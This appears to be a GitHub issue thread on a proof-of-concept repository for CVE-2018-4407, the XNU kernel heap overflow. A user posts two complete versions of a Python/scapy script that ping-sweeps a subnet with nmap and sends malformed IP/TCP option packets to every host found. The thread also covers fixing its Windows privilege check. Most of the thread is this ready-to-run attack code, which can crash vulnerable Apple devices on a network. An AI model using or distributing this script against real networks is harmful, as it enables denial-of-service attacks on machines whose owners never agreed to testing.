
PoC: heap buffer overflow in the networking code of the XNU kernel (CVE-2018-4407)

Here's how to get it to work on windows #2

Open FilterUnfiltered opened 5 years ago

FilterUnfiltered commented 5 years ago

On lines 25-26 of the script you see this:

# scapy needs raw sockets, which on POSIX means an effective uid of 0.
if os.geteuid() != 0:
    sys.exit('\nscapy requires root privileges.\n')

First, add `import ctypes` at the top of the file; then replace the current permission check with the following to make it multi-platform (`os.geteuid` does not exist on Windows, so the `AttributeError` branch falls back to the Win32 `IsUserAnAdmin()` call):

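# Cross-platform privilege check.  os.geteuid() only exists on POSIX; on
# Windows the attribute lookup raises AttributeError and we fall back to the
# Win32 shell32 IsUserAnAdmin() call.
try:
    if os.geteuid() != 0:
        sys.exit('\nscapy requires root privileges.\n')
except AttributeError:
    # IsUserAnAdmin() returns non-zero when the process token is elevated,
    # so a falsy result is the case that must exit.  The previous
    # `not ... == 0` spelling had the polarity inverted and exited only
    # when the user *was* an administrator.
    if not ctypes.windll.shell32.IsUserAnAdmin():
        sys.exit('\nscapy requires root privileges.\n')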

the final code should look like this:

#! /usr/bin/python3

import ctypes
import os
import time
import nmap
import struct
from scapy.all import *

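def attack(src='192.168.1.95', subnet='192.168.1.0/24'):
    """Ping-sweep `subnet` with nmap and send the CVE-2018-4407 trigger to every host found.

    Each trigger is an IP packet carrying IP options plus a TCP segment with
    two oversized kind-19 options; the IP option length is stepped from 1 to
    40 bytes (the most an IPv4 header can carry).  The packets go to *every*
    host the sweep returns, not only Apple devices, so run this only on a
    network you are authorised to test.

    Args:
        src: IPv4 address written into the IP source field.  It is handed to
            scapy unvalidated; a spoofed value is accepted as-is.
        subnet: nmap host specification for the sweep (CIDR by default).  It
            is passed verbatim to python-nmap and from there onto the nmap
            command line, so it must come from a trusted operator.

    Returns:
        None.  Progress is printed to stdout.
    """
    print("Scanning network, please wait...")
    scanner = nmap.PortScanner()
    scanner.scan(hosts=subnet, arguments='-sP')  # ping sweep only, no port scan
    print("Done with nmap configs...")
    # Sort numerically so 192.168.1.2 precedes 192.168.1.10 (lexical order would not).
    hosts = sorted(scanner.all_hosts(), key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
    print("Done enumerating list...")
    # TCP side is constant: two kind-19 options of 18 bytes each.  A fresh
    # list is handed to scapy per packet so no shared object is reused.
    tcp_options = ((19, "x" * 18), (19, "x" * 18))
    for length in range(1, 41):
        payload = "x" * length
        for host in hosts:
            print(f"[*] Sending Payload to {host} | Payload: {payload}")
            send(IP(src=src, dst=host, options=payload) / TCP(options=list(tcp_options)))
            time.sleep(0.2)  # pace the flood so the sweep target is not swamped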

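if __name__ == '__main__':
    # `sys` is used below but the listing never imports it explicitly; it
    # only reaches this scope by leaking through `from scapy.all import *`.
    import sys

    def _require_privileges() -> None:
        """Exit unless the process can open raw sockets (root / elevated).

        On POSIX that means an effective uid of 0.  On Windows `os.geteuid`
        does not exist, so fall back to shell32's IsUserAnAdmin(), which
        returns non-zero when the process token is elevated.
        """
        if hasattr(os, 'geteuid'):
            if os.geteuid() != 0:
                sys.exit('\nscapy requires root privileges.\n')
        # Mind the polarity: a *zero* result is the unprivileged case.  The
        # earlier `not ... == 0` form was inverted and exited only when the
        # user actually was an administrator.
        elif not ctypes.windll.shell32.IsUserAnAdmin():
            sys.exit('\nscapy requires root privileges.\n')

    try:
        _require_privileges()
        isdefault = input('Default mode configuration:\nYour IP: 192.168.1.95\nYour subnet: 192.168.1.0/24\nGo to custom configuration ? ["yes"/"no"] ')
        # Only an exact "no" keeps the built-in defaults; any other answer
        # (including "No" or an empty line) goes to the custom prompts.
        if isdefault == 'no':
            attack()
        else:
            src = input('What is YOUR IP address ? (example: 192.168.1.95) ')
            subnet = input('What is the subnet address ? (example: 192.168.1.0/24) ')
            attack(src=src, subnet=subnet)
    except KeyboardInterrupt:
        # os._exit() skips interpreter shutdown, including stdio flushing,
        # so flush the message explicitly or it is lost when stdout is a
        # pipe.  The hard exit itself is kept (presumably so lingering
        # scapy/nmap work cannot keep the process alive after Ctrl-C).
        print('\nInterrupted\n', flush=True)
        os._exit(0)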
zteeed commented 5 years ago

thanks, you can make a pull request if you want ;)

FilterUnfiltered commented 5 years ago

No, I tested it and it didn't work (as written, the Windows branch exits when `IsUserAnAdmin()` returns non-zero, i.e. when the process *is* elevated, so the check is inverted). My current working code, which oddly works without opening the prompt as admin, is this:

#! /usr/bin/python3

import ctypes
import os
import time
import nmap
import struct
from scapy.all import *

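def attack(src='192.168.1.7', subnet='192.168.1.0/24'):
    """Ping-sweep `subnet` with nmap and send the CVE-2018-4407 trigger to every host found.

    Each trigger is an IP packet carrying IP options plus a TCP segment with
    two oversized kind-19 options; the IP option length is stepped from 1 to
    40 bytes (the most an IPv4 header can carry).  The packets go to *every*
    host the sweep returns, not only Apple devices, so run this only on a
    network you are authorised to test.

    Args:
        src: IPv4 address written into the IP source field.  It is handed to
            scapy unvalidated; a spoofed value is accepted as-is.
        subnet: nmap host specification for the sweep (CIDR by default).  It
            is passed verbatim to python-nmap and from there onto the nmap
            command line, so it must come from a trusted operator.

    Returns:
        None.  Progress is printed to stdout.
    """
    print("Scanning network, please wait...")
    scanner = nmap.PortScanner()
    scanner.scan(hosts=subnet, arguments='-sP')  # ping sweep only, no port scan
    print("Done with nmap configs...")
    # Sort numerically so 192.168.1.2 precedes 192.168.1.10 (lexical order would not).
    hosts = sorted(scanner.all_hosts(), key=lambda ip: struct.unpack("!L", inet_aton(ip))[0])
    print("Done enumerating list...")
    # TCP side is constant: two kind-19 options of 18 bytes each.  A fresh
    # list is handed to scapy per packet so no shared object is reused.
    tcp_options = ((19, "x" * 18), (19, "x" * 18))
    for length in range(1, 41):
        payload = "x" * length
        for host in hosts:
            print(f"[*] Sending Payload to {host} | Payload: {payload}")
            send(IP(src=src, dst=host, options=payload) / TCP(options=list(tcp_options)))
            time.sleep(0.2)  # pace the flood so the sweep target is not swamped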

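if __name__ == '__main__':
    # `sys` is not imported at file level in this listing; bring it in here
    # rather than relying on it leaking through `from scapy.all import *`.
    import sys

    def _warn_if_unprivileged() -> None:
        """Warn on stderr (without exiting) when the process looks unprivileged.

        The fatal check from the earlier revision was dropped because its
        Windows branch was inverted, and the script has been observed to
        send without an elevated prompt.  So this is advisory only: scapy's
        raw-socket send() normally needs root / an elevated token, and the
        error it produces without them is not obvious, hence the hint.
        """
        if hasattr(os, 'geteuid'):
            privileged = os.geteuid() == 0
        else:
            # Non-zero when the process token is elevated (Windows only).
            privileged = bool(ctypes.windll.shell32.IsUserAnAdmin())
        if not privileged:
            print('[!] Not running as root/admin; scapy send() may fail.', file=sys.stderr)

    try:
        _warn_if_unprivileged()
        attack()
    except KeyboardInterrupt:
        # os._exit() skips interpreter shutdown, including stdio flushing,
        # so flush the message explicitly or it is lost when stdout is a
        # pipe.  The hard exit itself is kept (presumably so lingering
        # scapy/nmap work cannot keep the process alive after Ctrl-C).
        print('\nInterrupted\n', flush=True)
        os._exit(0)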
zteeed commented 5 years ago

I will make some test with a Windows in order to improve the code